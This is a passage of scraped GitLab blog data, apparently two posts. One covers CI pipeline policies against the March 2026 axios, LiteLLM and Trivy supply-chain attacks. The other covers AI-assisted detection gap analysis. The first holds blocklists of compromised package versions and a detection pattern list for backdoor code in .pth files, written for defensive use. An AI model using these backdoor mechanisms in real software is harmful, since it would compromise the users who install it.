Here is how each one works.\n\n### Use case 1: Prevent accidental exposure in package publishing\n\n**Problem:** A source map file ended up in the npm package of an AI coding tool after the build pipeline skipped publish-time validation.\n\n**PEP approach:** We built an open-source Pipeline Execution Policy for exactly this class of error: [Artifact Hygiene](https://gitlab.com/gitlab-org/security-risk-management/security-policies/projects/supply-chain-policies/-/blob/main/artifact-hygiene.gitlab-ci.yml?ref_type=heads).\n\nThe policy injects `.pipeline-policy-pre` jobs that auto-detect the artifact type (npm package, Docker image, or Helm chart) and inspect the contents before any publish step runs. For npm packages, it performs three checks:\n\n1. **File pattern blocklist.** Scans npm pack output for source maps (.map), test directories, build configs, IDE settings, and src/ directories.\n\n2. **Package size gate.** Blocks packages exceeding 50 MB, like the 59.8 MB package that leaked the AI tool.\n\n3. **sourceMappingURL scan.** Detects external URLs (the R2 bucket pattern that exposed a major AI company’s source), inline data: URIs, and local file references embedded in JavaScript bundles.\n\nWhen violations are found, the pipeline fails with a clear report in the failed CI job logs:\n```text\n=============================================\nFAILED: 3 violation(s) found\n=============================================\nBLOCKED: dist/index.js.map (matched: \\.map$)\nBLOCKED: dist/index.js contains external sourceMappingURL\nBLOCKED: dist/utils.js contains inline sourceMappingURL\n\nThis check is enforced by a Pipeline Execution Policy. If this is a false positive, contact the security team to update the policy project or exclude this project.\n```\nThe policy has no user-configurable CI variables. Developers cannot disable or bypass it. 
Exceptions are managed by the security team at the policy level, ensuring a deliberate process and a clean audit trail.\n\nThe repository includes a test project with intentional violations (examples/leaky-npm-package/) so you can see the policy in action before deploying it to your organization. The [README](https://gitlab.com/gitlab-org/security-risk-management/security-policies/projects/supply-chain-policies/-/blob/main/README.md) includes a complete quick-start guide for setup and deployment.\n\n**What this catches:** Any one of these controls would likely have prevented the AI company's source code leak:\n\n* The source map file triggers the file pattern blocklist.\n* Its 59.8 MB size triggers the size gate.\n* The sourceMappingURL pointing to an external R2 bucket triggers the URL scan.\n\n### Use case 2: Detect dependency tampering and lockfile manipulation\n\n**Problem:** The axios attack introduced a malicious transitive dependency (`plain-crypto-js`) that executed a RAT on install. Anyone who ran npm install during the compromise window pulled in the trojan.\n\n**PEP approach:** The [Dependency Integrity policy](https://gitlab.com/gitlab-org/security-risk-management/security-policies/projects/supply-chain-policies/-/blob/main/dependency-integrity.gitlab-ci.yml) injects .pipeline-policy-pre jobs that auto-detect the package ecosystem (npm or Python) and perform three checks:\n\n**For npm projects** (triggered by `package-lock.json`, `yarn.lock`, or `pnpm-lock.yaml`):\n\n1. **Lockfile integrity.** Runs `npm ci --ignore-scripts`, which fails if `node_modules` would differ from what the lockfile specifies. This catches cases where package.json was updated but the lockfile was not regenerated, and also verifies SRI integrity hashes.\n2. **Blocked package scan.** Cross-references the lockfile’s full dependency tree against `blocked-packages.yml`, a GitLab-maintained list of known-compromised package versions. 
The shipped blocklist includes `axios@1.14.1`, `axios@0.30.4`, and `plain-crypto-js@4.2.1`.\n3. **Undeclared dependency detection.** After install, compares the contents of node_modules against the lockfile. Any package present on disk but absent from the lockfile indicates tampering (e.g., a compromised postinstall script that fetches additional packages).\n\n**For Python projects** (triggered by `requirements.txt`, `Pipfile.lock`, `poetry.lock`, or `uv.lock`):\n\n1. **Lockfile integrity.** Installs in an isolated virtual environment and verifies that the install succeeds from the lockfile.\n2. **Blocked package scan.** Same blocklist approach. The shipped list includes `litellm==1.82.7` and `litellm==1.82.8`.\n3. **.pth file detection.** Scans site-packages for `.pth` files containing executable code patterns (`import os`, `exec(`, `eval(`, `__import__`, `subprocess`, `socket`). This is the exact mechanism the LiteLLM backdoor used.\n\nWhen a violation is found:\n\n```text\n=============================================\nFAILED: 1 violation(s) found\n=============================================\nBLOCKED: axios@1.14.1 is a known-compromised package\n\nThis check is enforced by a Pipeline Execution Policy.\n```\n\nThe policy runs in *strict mode*: any dependency not present in the committed lockfile blocks the pipeline. If a developer needs to add a dependency, they commit the updated lockfile. The policy verifies that the installed version matches the committed version. If something appears that was not committed (e.g., a transitive dependency injected via a compromised upstream package), the pipeline blocks.\n\n**What this catches:** The introduction of `plain-crypto-js` as a new, previously unseen dependency would be flagged by the undeclared dependency check. The `axios@1.14.1` version would be caught by the blocked package scan. The LiteLLM `.pth` file would be caught by the `.pth` detection check. 
Each attack has at least one, and often two, independent detection signals.\n\n### Use case 3: Detect and block compromised tools before execution\n\n**Problem:** TeamPCP replaced trusted Trivy and Checkmarx GitHub Action tags with malicious versions. Any pipeline referencing those tags executed credential-stealing malware.\n\n**PEP approach:** The [Tool Integrity policy](https://gitlab.com/gitlab-org/security-risk-management/security-policies/projects/supply-chain-policies/-/blob/main/tool-integrity.gitlab-ci.yml) injects a `.pipeline-policy-pre` job that queries the GitLab CI Lint API (or falls back to evaluating the `.gitlab-ci.yml`), extracts the container image references, and compares them against an approved-image allowlist maintained by the security team.\n\nThe allowlist (`approved-images.yml`) supports three controls per image:\n\n**Approved repositories:** Only images from repositories on the list are permitted. An unknown repository blocks the pipeline.\n\n**Allowed tags:** Only specific tags are permitted within an approved repository. This prevents drift to untested versions.\n\n**Blocked tags:** Known-compromised versions can be explicitly blocked even if the repository is approved. The shipped allowlist blocks `aquasec/trivy:0.69.4` through `0.69.6`, the exact versions TeamPCP trojanized.\n\nWhen a violation is found, the pipeline fails before any other job runs:\n\n```text\n=============================================\nFAILED: 1 violation(s) found\n=============================================\nBLOCKED: aquasec/trivy:0.69.4 (job: trivy-scan)\n\n - tag '0.69.4' is known-compromised\n\nThis check is enforced by a Pipeline Execution Policy.\n```\n\nThe allowlist is maintained through merge requests (MRs) against the policy project. To add a new approved image, the security team opens an MR. To respond to a new compromise, they add a blocked tag. 
No code changes required, just YAML.\n\n**What this catches:** When images with unapproved tags are detected, the policy compares the image repository names and tags to an allowlist. A failed match blocks the pipeline before any scanner executes, preventing credential exfiltration.\n\n*Note: By extending the sample above, PEPs can be used to force pinning to digests over tags, which is immune to force pushes. This sample demonstrates a more basic tag-based enforcement pattern.*\n\n## Beyond PEPs: GitLab’s supply chain defenses\n\nPipeline Execution Policies are the enforcement layer, but they work best as part of a broader defense-in-depth strategy. GitLab provides several capabilities that complement PEPs for supply chain protection:\n\n### Secret detection\n\n[GitLab secret detection](https://docs.gitlab.com/user/application_security/secret_detection/) prevents credentials from landing in the repository in the first place, significantly reducing what a compromised pipeline tool can harvest. In the context of the March 2026 attacks:\n\n* Credentials stored in repositories are both easier for attackers to discover and slower to rotate. The Trivy incident showed that even the rotation process can be exploited: Aqua Security's rotation was not atomic, and the attacker captured newly issued tokens before the old ones were fully revoked. 
GitLab Secret Detection includes automatic revocation for leaked GitLab tokens and a partner API that notifies third-party providers to revoke their credentials, accelerating response when a breach does occur.\n\n* Secret detection combined with proper secret management (short-lived tokens, vault-backed credentials, minimal pipeline secret exposure) limits what an attacker can reach even when a trusted tool turns hostile.\n\n### Dependency scanning via software composition analysis (SCA)\n\nGitLab [dependency scanning](https://docs.gitlab.com/user/application_security/dependency_scanning/) identifies known vulnerabilities in project dependencies by analyzing lockfiles and manifests. In the context of the March 2026 attacks:\n\n* For LiteLLM, the compromised versions (1.82.7, 1.82.8) are tracked in GitLab's advisory database, flagging affected Python projects automatically.\n\n* For axios, dependency scanning identifies the compromised versions (1.14.1, 0.30.4) across every project in the organization, giving security teams a single view for assessing blast radius and prioritizing credential rotation.\n\n* Similarly, all npm packages compromised by TeamPCP's CanisterWorm propagation are also flagged if used.\n\n[GitLab Container Scanning](https://docs.gitlab.com/user/application_security/container_scanning/) detects vulnerable container images used in your deployments. For the Trivy compromise, Container Scanning flags the trojanized Trivy Docker images (0.69.4 through 0.69.6) when they appear in your container registry or deployment manifests.\n\n### Merge request approval policies\n\n[Merge request approval policies](https://docs.gitlab.com/user/application_security/policies/merge_request_approval_policies/) can require security team approval before changes to dependency lockfiles or CI/CD configurations are merged. 
This ensures a human checkpoint for the types of changes that supply chain attacks typically introduce.\n\n### Coming soon: Dependency Firewall, Artifact Registry, and SLSA Level 3 Attestation & Verification\n\nUpcoming GitLab supply chain security capabilities harden policy enforcement at two critical control points: the registry and the pipeline. The Dependency Firewall and Artifact Registry will block non-conforming packages, while SLSA Level 3 attestation will provide cryptographic proof that artifacts were produced by approved pipelines and remain unmodified. Together, they will give security teams verifiable control over what enters and exits the software supply chain.\n\n## What this means for your organization\n\nAmidst rising AI-assisted threats, attacks on CI/CD pipelines are becoming commonplace. The TeamPCP campaign shows how a single compromised credential can cascade across an ecosystem of trusted tools.\n\nIf your organization used any of the affected components, operate with the assumption that all of your pipeline secrets were exposed: rotate them immediately and audit systems for persisted backdoors. Either way, regularly rotating credentials and using short-lived tokens limits the blast radius of any future compromise.\n\nHere is what we recommend:\n\n1. **Pin dependencies to checksums, when possible.** Mutable version tags (like the ones TeamPCP hijacked) are not a security boundary. Use SHA-pinned references for all [CI/CD components](https://docs.gitlab.com/ci/components/#manage-dependencies) or actions and container images.\n\n2. **Run pre-execution integrity checks.** Use Pipeline Execution Policies to verify tool and dependency integrity *before* any pipeline job runs. This is the `.pipeline-policy-pre` stage.\n\n3. **Audit what you publish.** Every package publish step should include automated validation of the artifact contents. Source maps, environment files, and internal configuration should never leave your build environment. 
The [Supply Chain Policies](https://gitlab.com/gitlab-org/security-risk-management/security-policies/projects/supply-chain-policies) project provides a ready-to-deploy starting point for npm, Docker, and Helm artifacts.\n\n4. **Detect dependency drift.** Compare dependency resolutions against committed lockfiles on every pipeline run. Monitor for unexpected new dependencies.\n\n5. **Centralize policy management.** Do not rely on developers remembering to include security checks. Enforce them at the group or instance level through policies that developers cannot remove or skip.\n\n6. **Assume your security tools are targets.** If your vulnerability scanner, static application security testing (SAST) tool, or AI gateway can be compromised, it will be. Limit each tool to the minimum privileges it needs and verify that it can't reach anything else.\n\n## Protect your pipelines with GitLab\n\nIn under two weeks, attackers compromised production pipelines at organizations running some of the most widely adopted tools in the software development ecosystem.\n\nThe lesson is clear: Build pipelines need the same degree of centralized, policy-driven protection that we apply to networks and cloud infrastructure.\n\nGitLab Pipeline Execution Policies provide that enforcement layer. They ensure that security checks run on every pipeline, in every project, regardless of individual project configurations. Combined with dependency scanning, secret detection, and merge request approval policies, they can block, detect, and contain the class of attacks we saw in March 2026.\n\nThe [Supply Chain Policies](https://gitlab.com/gitlab-org/security-risk-management/security-policies/projects/supply-chain-policies) project provides a working Pipeline Execution Policy that catches the exact class of error behind the major AI company’s leak, with coverage for npm packages, Docker images, and Helm charts. 
Clone it, deploy it to your group, and ensure that all of your pipelines are ready for the supply chain attacks to come.\n\nTo get started with centralized pipeline policies, sign up for a [free trial of GitLab Ultimate](https://about.gitlab.com/free-trial/devsecops/).\n\n\n*This blog post contains \"forward-looking statements\" within the meaning of Section 27A of the Securities Act of 1933, as amended, and Section 21E of the Securities Exchange Act of 1934. Although we believe that the expectations reflected in these statements are reasonable, they are subject to known and unknown risks, uncertainties, assumptions and other factors that may cause actual results or outcomes to differ materially. Further information on these risks and other factors is included under the caption \"Risk Factors\" in our filings with the SEC. We do not undertake any obligation to update or revise these statements after the date of this blog post, except as required by law.*","Pipeline security lessons from March supply chain incidents","Learn how centralized pipeline policies can detect and block the patterns behind a series of recent attacks.",[22,738,739,24],[749],"Grant Hickman","https://res.cloudinary.com/about-gitlab-com/image/upload/v1772630163/akp8ly2mrsfrhsb0liyb.png","2026-04-07",{"featured":32,"template":14,"slug":753},"pipeline-security-lessons-from-march-supply-chain-incidents",{"content":755,"config":765},{"body":756,"category":11,"date":757,"tags":758,"title":760,"description":761,"authors":762,"heroImage":764},"After an incident wraps up, every incident response or security operations center faces the same uncomfortable question: What did we miss, and why? Answering that question well takes real work — someone has to read through the incident timeline, map the attacker's actions to detection opportunities, identify the alerts that should have fired but didn't, and translate those findings into concrete improvements. 
Done manually, it's time-consuming, inconsistent, and easy to deprioritize when the next incident is already knocking.\n\nAt GitLab, our Signals Engineering team is responsible for building and maintaining the detections that protect the platform and the company. We deal with the same detection gap problem that every security team does, so we’ve automated detection gap analysis with [GitLab Duo Agent Platform](https://about.gitlab.com/gitlab-duo-agent-platform/) to improve how we assess those gaps and how we close them.\n\nIn this article, you'll learn our strategy, which includes two AI agents you can use in your environment: the built-in Security Analyst Agent and a custom agent we built and named the Detection Engineering Assistant.\n\n\n## The detection gap problem\n\nA detection gap is exactly what it sounds like: an attacker took an action, and your detections didn't catch it. Gap analysis is the process of systematically reviewing security incidents to identify those missed opportunities and determine what new or improved detections would close them.\n\nThe challenge isn't that gap analysis is conceptually hard. It's that it requires careful, methodical reading of incident data and mapping those events to your detection coverage. For a single incident, a skilled analyst can do it well. But across a steady stream of incidents, with multiple engineers contributing, it's difficult to maintain consistency and easy to let the review become shallow.\n\nWe wanted a process that was repeatable, thorough, and embedded directly in the workflow where our security incidents already live: GitLab issues.\n\n## What is GitLab Duo Agent Platform?\n\n[GitLab Duo Agent Platform](https://about.gitlab.com/blog/gitlab-duo-agent-platform-is-generally-available/) is GitLab's framework for building and deploying AI agents that can reason, take actions, and integrate natively with GitLab resources like issues, merge requests, and code. 
Unlike a simple chat interface, agents in Duo Agent Platform can be given specific roles, domain knowledge, and access to tools, making them effective for domain-specific workflows like security operations.\n\nGitLab Duo Agent Platform gives you two practical paths:\n\n1. **Use a pre-built agent** — GitLab ships several out-of-the-box agents, including a Security Analyst Agent designed for security-related tasks.  \n2. **Build your own agent** — You can create a custom agent in just a few minutes by giving it a name, a description, and a system prompt. The system prompt is where the real power lies.\n\nBoth paths are viable for detection gap analysis. Let's look at each.\n\n## 1. Security Analyst Agent\n\nThe easiest way to get started is with [Security Analyst Agent](https://docs.gitlab.com/user/duo_agent_platform/agents/foundational_agents/security_analyst_agent/), which comes pre-configured with security domain knowledge and can be invoked directly from a GitLab issue.\n\nTo use the agent for gap analysis, we navigate to a closed incident issue and ask the agent to review the incident description, timeline, tasks, and comments to identify where detections were absent or insufficient. The agent reads the issue content — including comments, linked artifacts, and timeline details — and reasons over it to surface potential gaps. It can identify undetected tactics, techniques, and procedures (TTPs) mapped to MITRE ATT&CK and suggest areas where new detection rules could improve coverage.\n\nThis works well for a quick first pass, especially if your incident issues are well-documented. Security Analyst Agent is knowledgeable about general security concepts, common attacker behaviors, and detection principles. 
For teams just getting started with AI-assisted operations, it provides immediate value with no configuration required.\n\nThat said, the pre-built agent doesn't know your specific environment, including your SIEM, your log sources, your detection stack, or your team's detection engineering standards. For us, that meant the recommendations, while valid in general, sometimes missed the specific context we needed to translate them into actionable detections. That's what led us to build our own agent.\n\n## 2. Building the Detection Engineering Assistant\n\n[Creating a custom agent in GitLab Duo Agent Platform](https://docs.gitlab.com/user/duo_agent_platform/agents/custom/) is surprisingly straightforward. From the Duo Agent Platform interface, you give the agent a name (we called ours the **Detection Engineering Assistant**), a brief description, and a system prompt. That's it. The agent is ready to use.\n\nThe system prompt is the most important part. It's the agent's knowledge base: everything it knows about your team, your environment, your standards, and how it should reason about its work. A thin, vague system prompt produces thin, vague output. A verbose, carefully crafted system prompt produces an agent that behaves like a knowledgeable member of your team.\n\nHere's the approach we took when writing our system prompt for the Detection Engineering Assistant:\n\n### Define the agent's role and scope clearly\n\nWe opened the system prompt by telling the agent exactly what it is and what it's responsible for. 
Not just \"you are a security analyst.\" We specifically prompted: \"You are a detection engineering assistant for GitLab's Signals Engineering team, responsible for analyzing security incidents and identifying gaps in our detection coverage.\" This framing anchors every response it produces.\n\n### Encode your detection philosophy\n\nWe wrote out what \"a good detection\" means to us: low false positive rates, high signal fidelity, and actionable alerts that provide responders with the context they need. We explained our preference for behavioral detections over IOC-based detections where possible, and described how we think about the tradeoff between coverage breadth and alert fatigue.\n\n### Give it context on your tech stack and log sources\n\nAn agent can only recommend what you can actually build. We told the agent which log sources we ingest, what our SIEM looks like, and what data is and isn't available to us. This means when it recommends a new detection, it does so in terms of what we can actually implement, not hypothetical telemetry we don't have.\n\n### Ground it in MITRE ATT&CK\n\nWe told the agent to organize its gap findings using ATT&CK tactics and techniques. This gives us consistent, structured output that maps directly to how we track coverage internally, and makes it easy to prioritize which gaps to address first.\n\n### Set expectations for output format\n\nWe specified exactly what we want the agent to produce: a structured list of detection gaps, each with the relevant ATT&CK technique, a description of what was missed, the log source or data that could support a detection, and a recommended approach. A consistent output format makes the findings easier to triage and turn into engineering work.\n\n### Example system prompt excerpt\n\n*Note: Our full Detection Engineering Assistant system prompt is 1,870 words and 337 lines. 
The excerpt below is only a small sample of what a full custom system prompt can look like.* \n\n\n```text\nYou are the Detection Engineering Assistant for GitLab's Security Operations team. Your role is to analyze closed security incidents and identify gaps in our detection capabilities.\n\nWhen reviewing an incident, you should:\n1. Identify each distinct attacker action or technique described in the incident timeline\n2. For each action, assess whether our existing detections would have caught it\n3. For any action that would not have been detected, document it as a detection gap\n\nFor each gap, provide:\n- MITRE ATT&CK Technique ID and name (e.g., T1078 - Valid Accounts)\n- A plain-language description of what happened and why it wasn't detected\n- The log source or telemetry that could support a detection (e.g., authentication logs, process execution events, network flow data)\n- A recommended detection approach, written in terms our SIEM can implement\n\nOur SIEM ingests [log sources]. Our detection standards prioritize behavioral patterns over static IOCs. Avoid recommending detections that would generate significant false positives without a high-confidence tuning path...\n```\n\nA system prompt this specific produces dramatically more useful output than a generic one. The agent stops giving you general security advice and starts giving you detection engineering recommendations.\n\n## Running gap analysis on incidents\n\nWith the Detection Engineering Assistant configured, the workflow is simple. At the close of an incident, we open the incident issue in GitLab and invoke the assistant. 
It reads the full issue — the incident summary, timeline, investigative notes, and any linked resources — and returns a structured gap analysis.\n\nA typical output looks like this:\n\n**Gap: Lateral movement via valid credentials not detected**\n\n* **ATT&CK:** T1078.004 — Valid Accounts: Cloud Accounts  \n* **What happened:** An attacker used a valid access token to authenticate to an auxiliary GitLab instance. No alert fired because we lacked authentication baseline detections for that instance.  \n* **Log source:** Authentication logs from `example.gitlab.com`  \n* **Recommended approach:** Create a detection that alerts on first-time authentication from a user account to `example.gitlab.com` within a 90-day rolling window, with suppression for accounts with established access patterns.\n\nThis kind of structured output goes directly into our engineering backlog. We treat the agent's analysis as a high-quality first draft. It gets reviewed by a human engineer who validates the findings, checks whether gaps are already covered by detections we haven't documented, and adds context before it becomes an engineering issue. But the hard work of reading the incident and generating the initial findings is automated.\n\n## What we've learned\n\nA few things stand out from building and iterating on this workflow:\n\n**The system prompt is a living document** — Every time the agent produces an output that misses something obvious or gets the framing wrong, we update the prompt. The agent's quality is a direct reflection of how well we've encoded our domain knowledge into it.\n\n**Incident documentation quality matters** — An agent can only reason over what's written down. Incidents with detailed, structured timelines produce much better gap analysis than sparse or informal ones. 
Building the gap analysis workflow created an unexpected second benefit: it gave us a concrete reason to improve our incident documentation standards.\n\n**This is a force multiplier, not a replacement** — The Detection Engineering Assistant doesn't replace a skilled detection engineer, but it does amplify one. The engineer still reviews the findings, validates the recommendations, and makes the final call on what goes into the backlog. But the time spent on the initial analysis drops significantly, and the consistency across incidents improves.\n\n## Get started\n\nIf you want to build your own detection gap analysis agent, here's where to start:\n\n1. Review your last three to five closed incidents and note what a good gap analysis would have surfaced for each.  \n2. Use those observations to draft a system prompt that encodes your environment, standards, and preferred output format.  \n3. Create a [custom agent](https://docs.gitlab.com/user/duo_agent_platform/agents/custom/) in GitLab Duo Agent Platform with your prompt.  \n4. Run it against one of your incidents and iterate on the prompt based on the output.\n\nThe detection gap problem isn't going away. But with GitLab Duo Agent Platform, you can make the analysis repeatable, consistent, and embedded directly in the place where your security work already happens. 
\n\n> Start [a free trial of GitLab Duo Agent Platform](https://about.gitlab.com/gitlab-duo-agent-platform/) today!\n","2026-03-10",[22,23,739,759,24,738,545],"AI/ML","Automating detection gap analysis with GitLab Duo Agent Platform","Learn how GitLab's Signals Engineering team uses our AI platform to automatically surface detection gaps from security incidents — no manual review required.",[763],"Matt Coons","https://res.cloudinary.com/about-gitlab-com/image/upload/v1773147991/op5xyroonltdwqix0x3u.png",{"featured":13,"template":14,"slug":766},"automating-detection-gap-analysis-with-gitlab-duo-agent-platform",{"promotions":768},[769,783,794,805],{"id":770,"categories":771,"header":773,"text":774,"button":775,"image":780},"ai-modernization",[772],"ai-ml","Is AI achieving its promise at scale?","Quiz will take 5 minutes or less",{"text":776,"config":777},"Get your AI maturity score",{"href":778,"dataGaName":779,"dataGaLocation":250},"/assessments/ai-modernization-assessment/","modernization assessment",{"config":781},{"src":782},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1772138786/qix0m7kwnd8x2fh1zq49.png",{"id":784,"categories":785,"header":786,"text":774,"button":787,"image":791},"devops-modernization",[738,580],"Are you just managing tools or shipping innovation?",{"text":788,"config":789},"Get your DevOps maturity score",{"href":790,"dataGaName":779,"dataGaLocation":250},"/assessments/devops-modernization-assessment/",{"config":792},{"src":793},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1772138785/eg818fmakweyuznttgid.png",{"id":795,"categories":796,"header":797,"text":774,"button":798,"image":802},"security-modernization",[22],"Are you trading speed for security?",{"text":799,"config":800},"Get your security maturity 
score",{"href":801,"dataGaName":779,"dataGaLocation":250},"/assessments/security-modernization-assessment/",{"config":803},{"src":804},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1772138786/p4pbqd9nnjejg5ds6mdk.png",{"id":806,"paths":807,"header":810,"text":811,"button":812,"image":817},"github-azure-migration",[808,809],"migration-from-azure-devops-to-gitlab","integrating-azure-devops-scm-and-gitlab","Is your team ready for GitHub's Azure move?","GitHub is already rebuilding around Azure. Find out what it means for you.",{"text":813,"config":814},"See how GitLab compares to GitHub",{"href":815,"dataGaName":816,"dataGaLocation":250},"/compare/gitlab-vs-github/github-azure-migration/","github azure migration",{"config":818},{"src":793},{"header":820,"blurb":821,"button":822,"secondaryButton":827},"Start building faster today","See what your team can do with the intelligent orchestration platform for DevSecOps.\n",{"text":823,"config":824},"Get your free trial",{"href":825,"dataGaName":49,"dataGaLocation":826},"https://gitlab.com/-/trial_registrations/new?glm_content=default-saas-trial&glm_source=about.gitlab.com/","feature",{"text":516,"config":828},{"href":53,"dataGaName":54,"dataGaLocation":826},1777934792006]